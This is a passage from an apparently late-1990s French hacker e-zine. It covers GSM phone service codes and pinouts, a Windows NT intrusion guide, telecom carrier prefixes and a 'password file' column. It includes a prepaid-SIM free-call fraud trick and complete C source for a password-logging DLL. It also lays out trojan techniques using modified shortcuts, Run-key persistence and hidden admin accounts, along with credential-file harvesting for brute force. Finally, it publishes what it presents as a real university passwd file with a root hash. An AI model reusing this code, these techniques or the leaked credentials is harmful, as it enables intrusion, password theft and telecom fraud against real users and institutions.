dévérouillage par acces direct dans l'EEPROM sera nécessaire. Dernière version du logiciel : <970905> Brochage externe : 1 = + external power supply 2 = RS232 input (TTL) 3 = GND (digital) 4 = RS232 output (TTL) 5 = +5V output 6 = Test 7 = Mute 8 = Internal/external 9 = GND (analogic) 10 = ? 11 = BF in 12 = BF out Courte description 1: alimentation externe pour charger la batterie. Cette alimentation branchée sans la présence d'une batterie, ne permettra pas d'utiliser le téléphone. Voltage suggéré 7.2V avec 600mA au moins. 2: Entrée ligne série RS232 niveau TTL (0/5V). Quand le téléphone est allumé, cette broche est à "0". 3: GND digital 4: Sortie ligne série RS232 niveau TTL (0/5V). Quand le téléphone est allumé, cette broche est à "1". 5: Sortie +5V quand le téléphone est allumé. 6: Mode test. En general, est a "0". Pour basculer en mode test, eteindre le telephone, mettre la broche a "1" (+5V), allumer le téléphone. Dans ce mode, la ligne serie marche à 115200 au lieu de 9600 en mode normal. 7: Mute. Normalement a "0", passe a "1" durant une conversation. Pratique pour couper l'autoradio par exemple. 8: Si ouvert, le micro et le haut-parleur internes sont actives. Si a "0", ceux en externe seront activés. 9: GND analogic. 10: Cette broche est encore inconnue. Elle parait atenuer le micro et le haut-parleur lorsqu'elle est a "0". 11: entrée BF. 12: Sortie BF. Comment communiquer avec le telephone ? ? La ligne serie dialogue en mode 9600 n 8 1. En fait, elle repond aux commandes AIES "at" mais rien de plus. Astuces Raccourci pour le menu des derniers numeros composes : Ce menu est accessible en pressant la touche YES, mais l'est aussi en pressant "0" puis "#". Lorsque le telephone est eteind, et qu'il n'est pas en chargement, le niveau de batterie peut etre affiche pendant une periode tres courte en pressant tres rapidement la touche "NO". Ainsi l'indicateur de batterie s'affiche pendant environ 2 secondes. Nom complet du reseau : Pour afficher le nom complet du reseau, aller dans le menu "RESEAUX", et usiliser "SELECTION" ou "LISTE" pour afficher les reseaux disponibles. Ensuite, presser "*" pour afficher le nom complet du reseau desire. Pour afficher la liste complete des operateurs acceptes par votre telephone, aller dans la fonction "LISTE" du menu "RESEAUX". Losque le telephone a fini sa recherche, presser "<" puis deux fois "YES". La liste complete des operateurs s'affiche. Utiliser "<" et ">" pour se deplacer dans la liste. Appels gratuits : Ce procede ne semble marcher qu'avec les cartes prepayees, et uniquement dans certains pays. La carte prepayee, est une carte SIM qui possede un certain nombre de credits, tout comme une telecarte normale. Composer le numéro et presser "YES". Une fois que le message "CONNECTE" s'affiche : Presser "CLR" puis "0" puis "#" puis deux fois "NO" pour eteindre le telephone. On peut encore converser au telephone, mais la carte SIM n'enregistre pas l'appel (selon les pays). A la fin de l'appel, le seul moyen de remettre le telephone en etat normal, est de retirer la batterie. IMEI (International Mobile Equipment Identity): XXXXXX-XX-XXXXXX-X TAC FAC SNR SP TAC = Type Approval Code (first 2 digits = country code of the approval-country ) FAC = Final Assembly Code (01,02 = AEG) (10 Nokia) (41,44 Siemens) (51 Sony,Siemens,Ericsson) SNR = Serial Nr. SP = Spare (always "0") __________ Nokia 6110 Pour voir le numero IMEI: *#06# Pour voir la version du Software: *#0000# 1ere Ligne - Version du Soft 2eme Ligne - Date de sortie du Software 3eme Ligne - Type de cell. Pour avoir plus d' infos sur le cell (numero de serie): *#92702689# 1er Ecran - Date de fabrication du cell 2eme Ecran - # de Serie, IMEI 3eme Ecran - Date d' achat 4eme Ecran - Derniere date de reparation *3370# pour avoir une meilleure qualite d' appel [ce qui diminue la duree de vie de la batterie] #3370# pour enlever cette option Note: apres avoir presse ces touches, le cell se reinitialisera avec l' option choisie. *4720# pour activer une qualite moyenne sur le GSM [la qualite baisse, mais la duree de la batterie augmente de 30%] #4720# pour desactiver cette option. __________ NOKIA 5110 Pour voir le numero d' IMEI: * # 0 6 # Pour voir la version du soft: * # 0 0 0 0 # Derniere version: V. 4.59 (01-06-98) Puis vous verrez: la version du soft, sa date de sortie, le type de cell. Pour avoir + d' infos a propos du cell, entrez: * # 9 2 7 0 2 6 8 9 # Vous verrez la date de fabrication, le numero de serie, et le numero IMEI, la derniere date de reparation. Pour ameliorer la kalite d' appel, et diminuer la vie de la batterie, entrez * 3 3 7 0 # (pour l' enlever, tapez # 3 3 7 0 #). Pour diminuer la kalite d' appel et augmenter la duree de vie de la batterie, tapez * 4 7 2 0 # (pour l' enlever, tapez # 4 7 2 0 #). Pour trouver rapidement et composer un numero, pressez puis la premiere lettre du nom (pour john, pressez 5). Pour changer rapidement le profil du cell, pressez deux fois rapidement, en attendant d' avoir le choix du profil, puis maintenez la touche enfoncee. __________ Nokia 3110 Pour voir le numero d' IMEI: * # 0 6 # Pour voir la version du soft:*#3110# Par exemple: V 07.11 Version du Software. 24-09-97 Date de sortie du software. NHE-8 Type de phone. La derniere version connue est: V 7.32 Tapez *#92702689# . Un code va vous etre demande: 6232 (OK) : Montre l' annee et le mois de fabrique. 7332 (OK) : Montre la date de la derniere reparation 7832 (OK) : Montre la date de vente du cell. 9268 (OK) : Montre le numero de serie. 37832 (OK) : Pour etablir la date de vente (a n' utiliser k' une seule fois). 87267 (OK) : Pour confirmer le transfert. Pour verifier si l' horloge SIM peut etre stoppee: *#746025625# Pour initailiser la configuration: *#7780# Pinouts Desktop Charger----------------------| | | | | CHARGER--| + TOP OF PHONE - V V 1 2 3 4 5 6 V (o) | | [= = = = = =] | | 7 8 9 10 11 12 ______________________ Nokia 2110i/2110e/9000 IMEI Pour voir le numero d' IMEI: * # 0 6 # Pour mettre en marche l' id, entrez *#30#[SEND] . Pour le call-blocking, entrez *#31#[SEND] Pour permettre de voir les sites de cells, [MENU] 4 9 1 Pour avoir la version du software sur les 2110e / 2110i, entrez *#170602112302# Pour les versions plus recentes: *#682371158412125# The phone should display something similar to this: V 5.31 Version du soft 06-01-96 Date de fabrication NHE-4 modele GE8 = 9000? Kelkes raccourcis pour les 2110i ! Entrez : * puis 'Memory' puis 'Find' ou * et la fleche du bas Resultat : Vous apercevez les appels recus. Entrez : + puis 'Memory' puis 'Find' ou + et la fleche du bas Resultat : Vous apercevez les appels mankes. Pressez 'Menu', puis le bouton 'vert' vous permet de transmettre les codes DTMF. __________________________________________________________ Motorola d460, 2500, 6200 (Flare), 7500, 8200, 8400 & 8700 *#06# donne l' IMEI pour les 8700, mais pas pour les 6200, 7500, 8200 Pour activer la RBS (Radio Base Station): ('pause' signifie ke la touche * est pressee en attendant ke la fenetre apparaisse) [pause] [pause] [pause] 1 1 3 [pause] 1 [pause] [ok] Vous devez maintenant presser [MENU] et naviguer jusk'a la fonction 'Eng Field Options', et le valider? Pour desactiver la RBS: [pause] [pause] [pause] 1 1 3 [pause] 0 [pause] [ok] Cela ne fonctionnera k' avec certaines versions de softwares. Utilisation de la RBS: Distance a la station - Faites un appel. Lorsque ca repond, pressez [MENU] tant ke 'Eng Field Option' apparait, pressez [OK], selectionnez 'Active Cell', pressez [OK], pressez [MENU] tant ke 'Time Adv xxx' apparait, xxx etant un numero. Multipliez ce numero par 550, et le resultat est la distance entre votre cell et la RBS, en metres. Qualite du signal - pressez [MENU] tant ke 'Eng Field Option' apparait, pressez [OK], selectionnez 'Active Cell', pressez [OK], pressez [MENU] tant ke 'C1' apparait. C' est la qualite du signal. Si ca reste negatif pendant plus de 5 secondes, un nouveau cell est selectionne. ______________ Panasonic G500 Pour voir le numero d' IMEI: * # 0 6 # PINOUTS 1 - Ground 2 - TX_Audio 3 - Audio_Ground 4 - HF_ON (L=ON) -> L=H/F ON 5 - AOP_Sense <- Selection de l' adaptateur DATA 6 - Serial_Up <- UART up (9600,33.8kbps) 7 - Serial_Down -> UART down 8 - External_Power <- Puissance pour le rechargement 9 - Ground 10 - RX_Audio 11 - Radio_Mute -> L=MUTE 12 - HF_Sense <- L=H/F MODE 13 - Reserved L=FLASH WRITE ENABLE 14 - Ignition <- H=ON 15 - Logic_Power -> H=HANDSET ON 16 - PAON -> Power Amplifier Control Signal _________________ Philips PR 747/II Ce sont les memes codes que pour le Nokia 6110 ____________ Philips FIZZ IMEI: *#06# Lock Code: *#1234# Pour avoir la version du software, entrez *#8377*# Le resultat donnera kelke chose du genre: Version : 0916 - EEPROM : 00000000-00 - TDA : 2445 - KISS : 0502 SIM-LCK ..ou pour d autres versions de soft: *#5644*# Resultat: Version : 09162205 - EEPROM : 00000000-00 - TDA : 2445 - KISS : 0502 SIM-LCK Pinouts pour Fizz et Spark 1 GROUND 2 GROUND 3 HANDS FREE ON/OFF 4 MUTE 5 TX 6 RX 7 RTS 8 REPROGRAMMING 9 ON HOOK CHARGER (a peu pres 13V? a 14V) 10 AUX MIC 11 AUX SPEAKER 12 GROUND _____________ Philips GENIE IMEI: *#06# *#2254*# est le status de l' enregistre: C, BS, RR, MMI, CREAT. *#2255*# active et desactive le mode "DEBUG CALL". *#2558*# affiche le temps en jours, heures et minutes du temps depuis lekel vous etes connecte au reseau GSM Pour forcer une reconnection au reseau: *#2562*# Pour voir et modifier les codes de securite du telephone: *#7489*# Pour voir des infos sur votre carte SIm, comme le nom: *#7378*# Pour avoir des infos sur le SIM lock, Init et Flags: *#3377*# Pour activer et desactiver le sleep mode: *#7693*# Pour avoir des infos sur le sleep mode: *#8463*# _____________________ Siemens S1/S3:comfort MONITOR MODE Les series Siemens S1/S3 ont un mode moniteur ki peut etre active directement par le clavier. Pour activer ce mode, vous devez entrer le code special d' acces programme dans le telephone. Protocole: Allumez le telephone Entrez le code d' acces du PIN, et pressez [OK]. Pressez [Menu]. Pressez [9]. Pressez [8] (ca peut etre le [7] sur certains cells). Vous devriez voir votre IMEI Pressez la touche en haut a gauche du menu. 7684666 Touche de raccrochage. ____________________________________ Siemens S4/S4 Power ; Sony CM DX 100 MONITOR MODE Idem ke pour les S1/S3, sauf k' il faut presser [7] au lieu de [8]. Presser le bouton droit d' affichage lorske vous etes en monitor mode permet de montrer une liste de 6 cells ayant les plus forts signaux. Indicateurs du mode Test: (* = seulement dispo lors d' un appel) CH Numero du canal RX Force du signal (dB) N NCC (Color Code) B BCC (Color Code) CI Cell ID (en Hex) C1+ temps avant ke le cell force la connection. (see RX and RXAM) LAI Location Area Identity. Montre le code Id du reseau (42F010 = 240.01) et MSC TXPWR Puissance de transmission (dB) RXAM Force du signal recu. TS* Temps de coupure TA* Distance a la Tour en Km X 2 PL* Niveau de Puissance Tableau de puissance PL: 5 6 7 8 9 10 11 12 13 14 15 dB: 33 31 29 27 25 23 21 19 17 15 13 Watts: 2 1.3 .8 .5 .3 .2 .13 .08 .05 .03 .02 LF* C1 valeur avec transmission continue de la Tour LS* C1 valeur avec transmission discontinue de la Tour QF* Taux d' erreur avec transmission continue de la Tour QS* Taux d' erreur avec transmission discontinue de la Tour Tableau du taux d' erreur (BER= Bit Error Rate) QF/QS register: 0 1 2 3 4 5 6 7 % of bit sent: 0.2 0.8 0.4 1.6 3.2 6.4 12.8 25.6 (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Windows NT, les bases #1 ) 2.6 ( cyberjunk ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) From: Cyberjunk [Snipper@Hotmail.com | www.multimania.com/cybjunk] To: Cryptel E-Zine Cc: Internet =) -------------------------------------------------------------------- 1. Introduction 2. Les réseaux Windows NT 2.1 Les protocoles 3. Les fichiers SAM.* 3.1 Ou sont-ils ? 3.3 Hack de NT en local 3.2 Comment cracker les mots de passe ? 4. Les commandes NET 4.1 Gestion des utilisateurs - Net Accounts - Net Group - Net Localgroup - Net User 4.2 Informations systéme - Net Computer - Net Config - Net Config Server - Net Session 4.3 Ressources réseau - Net Continue/Pause - Net File - Net Share - Net Start/Stop - Net Use - Net View 5. Les chevaux de troie 5.1 FPNWCLNT.DLL 5.2 Les raccourcies (.LNK) 5.3 Ou le mettre pour qu'il se lance au demmarrage ? 5.4 Quelque idées de conception 6. Windows 95/98, Failles de sécurité dans un domaine Windows NT [ Rem: Cette partie ne traite pas le méthode Netbios ] 6.1 Qui a dit que NetBios était pour les lames ? 6.2 Récupération de données pour une attaque sur NT 6.3 NAT [NetBios Auditing Tool] 7. Fin -------------------------------------------------------------------- 1. Introduction -------------------------------------------------------------------- Tout d'abord je tiens à préciser que ce texte n'est pas un RIP, mais il est obligé qu'il ressemble à certain autre vu le nombre d'article qui parle déjà de NT. A quoi sert -il ? ou A qui est-il destiné alors ? Déjà, il est en français, et a mon avis il est destiné à ceux qui ont envi de se mettre à jour. La triste vérité est là ... Windows NT s'impose dans le monde (impitoyable =) ) des serveurs... Il devrait vous permettre d'aller un plus loin que le NetBios, ou de comprendre des réseaux Microsoft dans votre université par exemple ou encore de bien préparer la future doc de Rhino 9, NT War Doc si vous n'êtes pas familier avec ce systéme. 2. Les réseaux Windows NT -------------------------------------------------------------------- 2.1 Les protocoles Windows NT commme la pluspart des OS Réseaux, accepte plusieurs protocoles et les fait fonctionner côte à côte. ------------------+------------------------------------------------------------- + NetBios/NetBeui | C'est le plus simple de tous les protocoles. developpé par | Microsoft, au temps du MsDos. Il comporte moins de 20 | commandes. ( Cf wsnetbs.h etc ... ) ------------------+------------------------------------------------------------- + NWlink | A partir de NT 3.5x. J'en sais pas plus. ------------------+------------------------------------------------------------- + TCP/IP | Je pense que c'est la peine de m'attarder la dessus. ------------------+------------------------------------------------------------- + DLC | Le protocole Data Link Control s'appuie sur le standart | 802.2 et est utilisé entre NT et les calculateurs Mainframes | ou des composants spécifiques commme les cartes JetDirect(HP) | ou markVision (LexMark). Tous ca pour dire, que vous risquez | de le croiser de temps à autre. ------------------+------------------------------------------------------------- + IPX/SPX | Réseaux utilisés pour communiquer avec NetWare (Novell) | sachant que NT n'a pas besoin de novell pour un LAN. ------------------+------------------------------------------------------------- 3. Les fichiers SAM.* -------------------------------------------------------------------- 3.1 Ou sont ils ? En fait sur un système NT Server, les mots de passe sont enregistrés dans un fichier appeller Sam, WINNTsystem32ConfigSam. Le problème de celui ce c'est qu'il est en utilisation permanente par le système. Donc il vous est impossible de l'ouvrir, et de le copier. Pour remedier a ce probleme, il existe de petit executable qui se chargeront pour vous de pouvoir vous autoriser a manipuler le fichier cible (samdump.exe par exemple). Par contre il faut savoir qu'il existe un autre Sam sur WINNTRepairsam._ Celui-ci est créer a l'installation de windows et contient donc le password administrateur. Rem: A l'inverse du premier, il n'est pas en utilisation permanente. ---- Ces fichiers (l'un ou l'autre) deviennet donc la cible d'une attaque sur NT, car l'important c'est d'avoir l'admin pour des raisons simples, avoir les droits d'accès totals sur la machines, et bien souvent sur tout le réseau =) . 3.2 Hack de NT en local Une technique tres simple consiste a booter avec une disquette dos, monter la partition NTFS avec 'ntfsdos.exe' et aller chercher le fichier de mot de passe. Une autre, basé sur le même principe, peut se faire depuis Linux. Comme c'est le cas dans mon univ, nous avons Linux/Nt en multiboot. On peut donc monter la partition Ntfs et aller chercher le fichier. Rem: Il faut être root pour utiliser la commande mount. ---- 3.3 Comment Cracker les mot de passe ? L0pht (www.l0pht.com) sont auteur d'un tres beau shareware appeller L0phtcrack, qui permet d'ouvrir un Sam, et de lancer du brute force dessus. Assez pratique la version actuelle contient même le samdump intégré. Pour ce qui est du shareware, vous pouvez l'utiliser pendant 1 semaine. Mais bon, je vou cacherez pas que le crack est dispo sur astalavista =) Toute fois, il y a aussi un programme en C dispo dans Phrack Issue 50, www.phrack.com (www.2600.com/phrack). Choisissez votre arme =) 4. Les commandes NET -------------------------------------------------------------------- Sous NT, pratiquement tout peut se être paramétré en utilisant ces commandes. L'interêt du paragraphe suivant n'est pas de re-ecrire l'aide ... =) Mais en fait, de vous faire voir ce qui est a votre portée depuis une station de travail, comment obtenir des informations sur les utilisateurs ou mot de passe par exemple ou encore comment faire des manips interessantes par rapport à la config réseaux (Domaines, Partage etc ....) L'interet secondaire de ces commandes, est de pouvoir ecrire des script intéressant ... =) En rapport avec les chevaux de trois !!! Mais vous l'aviez déja compris... j'en suis sûr ! 4.1 Gestion des utilisateurs Net Accounts ============ Si vous taper cette commande sans paramétre vous obtenez les infos relatifs au mot de passe, durée de validité, nombre de caractéres ... --------------------------------+--------------------------------------------------------- /FORCELOGOFF:[minutes|NO] | Indique en minute la durée d'une session usr sur le | serveur. Par défaut epêche une déconnexion forcée. --------------------------------+--------------------------------------------------------- /MINPWLEN:[longueur] | Taille du mot de passe --------------------------------+--------------------------------------------------------- /MAXPWAGE:[jour|unlimited] | Durée en jour de la validité des mot de passe --------------------------------+--------------------------------------------------------- /MINPWAGE:[jours] | Au bout de combien de jour le pass doit etre changer --------------------------------+--------------------------------------------------------- /UNIQUEPW:[nombre] | Repete le MEME mot de passe. Valeur max 8 --------------------------------+--------------------------------------------------------- /DOMAIN | La commande s'excutera sur le Serveur de domaine et pas | en local. --------------------------------+--------------------------------------------------------- Net Group ========= Affcihe les noms de groupe sur le serveur. --------------------------------+--------------------------------------------------------- /ADD | Ajoute un groupe --------------------------------+--------------------------------------------------------- /DELETE | Supprime un groupe --------------------------------+--------------------------------------------------------- /DOMAIN | La commande s'excutera sur le Serveur de domaine et pas | en local. --------------------------------+--------------------------------------------------------- Net Localgroup ============== Même chose sur la machine locale. Net User ======== Permet de gérer les comptes utilisateurs sur le serveur. Même si vous êtes sur un station de travail, cette commmande n'agit que sur le serveur. Exemple: net user login_user mot_de_pass [POUR LA SUITE VOIR LES PARAMS SUIVANTS] --------------------------------+--------------------------------------------------------- /ADD | Ajoute un user --------------------------------+--------------------------------------------------------- /DELETE | Supprime un user --------------------------------+--------------------------------------------------------- /DOMAIN | La commande s'excutera sur le Serveur de domaine et pas | en local. --------------------------------+--------------------------------------------------------- /ACTIVE:[YES|NO] | Active ou désactive un compte user --------------------------------+--------------------------------------------------------- /EXPIRES:[date|NEVER] | Faire désactiver un user a une date spécifique --------------------------------+--------------------------------------------------------- /HOMEDIR:chemin | Chemin du dossier de basede l'usr --------------------------------+--------------------------------------------------------- 4.2 Informations systéme Net Computer ============ Ajouter un ordinateur dans un domaine. Exepmle: NET COMPUTER \ip_de_l_ordi [PARAMATRES] --------------------------------+--------------------------------------------------------- /ADD | Ajoute un ordi --------------------------------+--------------------------------------------------------- /DEL | Supprime un ordi --------------------------------+--------------------------------------------------------- Net Config ========== Renvois des infos d'une machine. Exemple: NET CONFIG [PARAMETRE] --------------------------------+--------------------------------------------------------- SERVER | Renvoie des infos sur la config du server --------------------------------+--------------------------------------------------------- WORKSTATION | idem pour la station de travail --------------------------------+--------------------------------------------------------- Net Config Server ================= Permet de configurer de façon particuliére les serveur. Exemple: NET CONFIG SERVER [PARAMETRE] --------------------------------+--------------------------------------------------------- /AUTODISCONNECT:m | Durée de la déconnexion automatique si inactivité --------------------------------+--------------------------------------------------------- /HIDDEN | Permet de cacher un ordi lorsque l'on demande d'afficher | la liste des serveurs. --------------------------------+--------------------------------------------------------- Net Session =========== Appelle et termine les sessions d'un ordi du réseaux. Exemple: NET SESSION \ip_ordi [PARAMETRE] --------------------------------+--------------------------------------------------------- /DELETE | Termine la connexion sur un autre ordi --------------------------------+--------------------------------------------------------- 4.3 Ressources réseau Net Continue/Pause ================== Suspend ou active un service. Exemple: NET PAUSE/CONTINUE [service] Net File ======== Disponible que sur les serveurs, cette commande permet de ferme les fichiers partagé et Sans option elle renvoi la liste des fichiers ouverts sur le serveur avec leurs numéro. Exemple: NET FILE [numéro|/DELETE] --------------------------------+--------------------------------------------------------- /CLOSE | Ferme le fichier --------------------------------+--------------------------------------------------------- Net Share ========= La commande NET SHARE permet de consulter et de modifier les partages d'un serveur. Sans option, elle renvoient des informations sur les ressources partagées. Exemple: NET SHARE nom_de_partage=chemin [PARAMETRES] --------------------------------+--------------------------------------------------------- /USERS:nombre | Nbe de user ouvant y aller en même temps --------------------------------+--------------------------------------------------------- /DELETE | Arrette le partage --------------------------------+--------------------------------------------------------- Net Start ========= Arrette ou demarre un service. Exemple: NET START/STOP [service] Net Use ======= Elle permet de se connecter a un ordianteur distant. Sans option elle renvoie la liste des ressources partagées d'un ordinateu avce quelques bien spécifique. Exemple: NET USE \Ip_de_l_ordi [mot_de_passe] [PARAMETRES] --------------------------------+--------------------------------------------------------- /USER user | Nom de l'utilisateur avec lequel la connexion sera | établie (login...) --------------------------------+--------------------------------------------------------- /HOME | Relie l'utilisateur a son dossier d'origine (HOME ...) --------------------------------+--------------------------------------------------------- /DELETE | Terminer une connexion --------------------------------+--------------------------------------------------------- /PERSISTENT [YES|NO] | Rétablir a la prochaine ouverture ? --------------------------------+--------------------------------------------------------- Net View ======== Affcihe les ressources partagées. Exemple: NET VIEW \ip-de_l_ordi 5. Les chevaux de troie -------------------------------------------------------------------- 5.1 FPNWCLNT.DLL [Trouver dans le MHD de Rhino9 ] Cette Dll permet d'obtenir des noms d'utilisateurs et des mots de passe si le répertoire WinNTSystem32 est en mode Lecture et Ecriture. Le résultat est mis dans un fchier sur emp. Pour ma part je n'ai jammais trouver de tel systéme pour l'instant mais voila quand même la source .. Au cas ou v êtes plus chanceux que moi. :) ------------- cut -------------- #include #include #include struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:\temp\pwdchange.out", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "InitializeChangeNotify started ", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify (struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %x ", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } ------------- cut -------------- 4.2 Les raccourcies (.LNK) Le grand interêt de ces fichiers c'est que si vous pouvez les modifer et glisser un de vos gentils script à l'interieur. Je m'explique =) Vous avez chez vous préparé un .Bat (Ou un .Reg) en jouant avec les commandes NET, qui Partage le repertoire de celui qui l'execute. Admettons, que sur le bureau commun aux utilisateurs traine un wordpad.lnk. Si vous avez les droits, rien ne vous empêche de lancer un script qui partagera le repertoire HOME de l'utilisateur et qui apres qui lance wordpad. Une autre application, pourait ce passer sur serveur partagé ou tout le monde met ce qu'il veut. Assez fréquent dans les universités pour mettre en comun des ressources. Il Pourrait trainer par la un Pussy.lnk .. ou vous pourriez modifer les raccourcis Microsoft Office... Enfin bref, de toute façon je vous je vous fais confiance pour trouver ce qu'il faut, et de toute façon ca depend extremement du server. Il n'y pas de régle en général, sauf peut-être que le TEMP est tres souvent en accés complet pour tous les utilsateurs. 5.3 Ou le mettre pour qu'il se lance au démmarage ? Pour faire exécuter une commande au démarrage vous avez le choix entre le menu démarrer ou la base de registre. Les répertoire suivant corresponde au Menu Démmarrer : - C:WinNTProfilesDefault UserStart MenuProgramsStartUp ~ US - C:WinNTProfilesDefault UserMenu DémarrerProgrammesDémarrage ~ FR Sinon vous pouvez aussi le placer dans la base de registre: [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] Faites, Ajouter Châines, Puis taper le chemin de votre Script. 5.4 Quelques idées deconception: Grâce au commande NET, vous pouvez donc pratiquement configurer ou reconfiguer tous les paramétres réseaux et donc par conséquences obtenir pratiquement ce que vous voulez d'un utilisateur. Points intéressants: --------------------- N'oubliez pas que si vous n'avez pas les droits pour aller dans des répertoires clé du systéme, certain eux l'ont, arrangé vous donc qu'il lance votre script et qu'il facent ce que vous vouliez ou carrement qu'il vous donne les droits =) Un autre exepmle serait de faire ajouter un Super-utilsateur qui disparaitra au bout de 1 jour par exepmle. Je vous conseille vraiment d'installer WinNT et de tester vos programmes en Local. 6. Windows 95/98, Failles de sécurité dans un domaine Windows NT -------------------------------------------------------------------- Cette parti ne re-explique pas la methode NetBios mais à pour objectif de vous montrer quelques techniques d'attaques sur un serveur NT, en passant par des machines 95 ou 98 accéssible NetBios. 6.1 Qui a dit que NetBios était pour les lames ? Je tiens a rappeller pour ce qui avait déja mis NetBios au placard, peuvent ressortir leur attirail. Malgres le fait que ce procédé soit tres connus par la pluspart d'entre vous, je vous garantie qu'il marche encore tres bien (Surtout chez les petits ISP locaux), et c'est parfois un faille dans un réseau NT pourtant sécurisé. 6.2 Récupération de données pour une attaque sur NT Notre objectif reste toujours un serveur NT. Sur la machine 95, ramassez tout ce qui tourne autour des utilisateurs. - .pwl ~ Mot de passe de login sous 95, forte chance pour que ce soit les meme que pour NT. [CRYPTE] - ws_ftp.ini ~ Contient des mots de passe sauvgardés sur accés FTP. [CRYPTE] - pmail.ini ~ Contient des mots de passe de messagerie, par fois c'est le même que le password de login. [CRYPTE] - eudora.ini ~ Idem [CRYPTE] - mirc.ini ~ regarder la configuration du proxy. [CLAIR] - etc ... Une fois des mots de passe trouvés, cela vous constitue un bon petit dicotionnaire pour NAT. 6.3 NAT [NetBios Auditing Tool] Je pense que la majorité d'entre vous le connaissent déjà mais je tenniat à le rappeller. Ce petit utilitaire, permet de faire du brut force sur des ressources partagé. Son instalaltion est simple, un fichier contenant les noms d'utilisateurs et l'autres les mots de passes. NAT.EXE Disponible sur Technotronic. Interface graphique, Disponible sur Rhino9. 7. Fin -------------------------------------------------------------------- Bon voilà c’est fini ... Bonne chance à tous ! Le savoir n’est pas un crime ni les travaux pratiques. * Special msg: La paranoïa nous sauvera ... Have Phun ! (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Prefixes nationaux ) 2.7 ( vatoo ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Depuis le debut de l' annee, il est possible d' acceder aux operateurs prives grace a des prefixes. Il en existe deux types. Le premier, a un chiffre (dit " E "), est a composer a la place du 0 et a faire suivre des neuf chiffres habituels (a l' international, E0 au lieu de 00). A noter le cas particulier du 0, qui correspond a l' operateur de boucle locale auquel l' utilisateur est raccorde. Dans la plupart des cas, c' est malheureusement FT (pour l' instant ;). Dans de rares cas, ca peut etre Cegetel, Worldcom ou Colt pour un client directement relie a leur boucle optik, et FT est alors accessible par le 8. Le second type de prefixe est compose de 4 chiffres (du type 16XY), a composer avant les 10 chiffres habituels ( a l' international, 16XY00 au lieu de 00). Les prefixes sont utilisables pour les appels hors du departement Longue Distance. Ils ne sont pas utilisables depuis les cabines, vers les mobiles, vers les numeros speciaux ( 3BPQ et 08). C' est encore France Telecom qui s' y oppose, meme pour 1999. Liste des prefixes: Prefixe | Operateur ---------------|-------------------------- 2 | SIRIS 4 | TELETEL 5 | OMNICOM 6 | ESPRIT TELECOM 7 | CEGETEL 8 | FRANCE TELECOM 9 | 9 TELECOM 1601 | PROSODIE 1610 | TELEGLOBE 1611 | GEOLINK 1616 | AXS 1617 | INFOTEL 1618 | WORLDCOM 1620 | INTEROUTE 1623 | VIATEL 1626 | A TELECOM (AXIS) 1630 | KERTEL (PINAULT) <<<--- ouaish ouaish ;) 1633 | GLOBAL ACCESS 1639 | FIRST TELECOM 1640 | KAT' AQUITAINE 1654 | ESTEL (STRASBOURG) 1655 | WESTERN TELECOM <<<--- mes p'tits cowboyz ;) 1656 | PRIMUS 1659 | BELGACOM 1660 | UNIGLOBE 1661 | RSC COM 1670 | GOLDEN LINE 1677 | PHONE SYSTEMS 1678 | WORLDXCHANGE 1682 | KDD 1688 | LDI 1690 | COLT 1696 | ECONOPHONE (¯`'·.¸(¯`'·.¸_.·´`·._.·´`·.(¯`'·.¸ ¸.·'´¯).·´`·._.·´`·._¸.·'´¯)¸.·'´¯) ) Password FILE ) 2.8 ( Aaah@mail.dotcom.fr ( (_¸.·'´(_¸.·'´`·._.·´`·._.·´(_¸.·'´¯`'·.¸_)`·._.·´`·._.·´`'·.¸_)`'·.¸_) Suite a mon article du N°1 j'ai reçu plusieurs mails me disant: "ouais c'est kewl ta rubrique mais j'aimerais que tu nous montres la methode pour l'avoir, patati patata ..." A ceux là je reponds par 2 choses : un articles sur les exploits UNIX est en preparation, les méthodes n'ont absolumnent rien d'extraordinaires ces des exploits connus qu'on peut trouver sur rootshell et compagnie (bug sendmail, cgi etc ...) alors je vais pas reexpliquer ces methodes archi maintes fois rabachées ! Bon bah ce mois ci je vous donne 2 passwords file d'université l'un en Angleterre, et l'autre aux States (petit coucou aux admins). Je lance aussi un grand sondage pour ou contre cette rubrique vous m'envoyez votre vote sur Aaah@mail.dotcom.fr SI YA MOINS DE 10 VOTES J'ARRETE CETTE RUBRIQUE ! ========================================================================== www.cl.cam.ac.uk: Computer LABORATORY university of CAMBRIDGE **************** root:RK2fP/SciTdfE:0:1:Root:/:/bin/sh daemon:*:1:1:system background account:/: bin:*:3:4:system librarian account:/bin: uucp:*:4:39:UUCP/FAX gateway:/var/spool/fax: fax:*:4:39:Facsimile Agent:/var/spool/fax: tcb:*:9:18:Trusted Computing Base:/tcb: adm:*:10:32:Administration Subsystem:/usr/adm:sr/opt/amanda:/dev/null ileaf:*:79:1:Interleaf:/usr/groups/interleaf:/dev/null sendmail:*:83:1:Sendmail:/:/dev/null 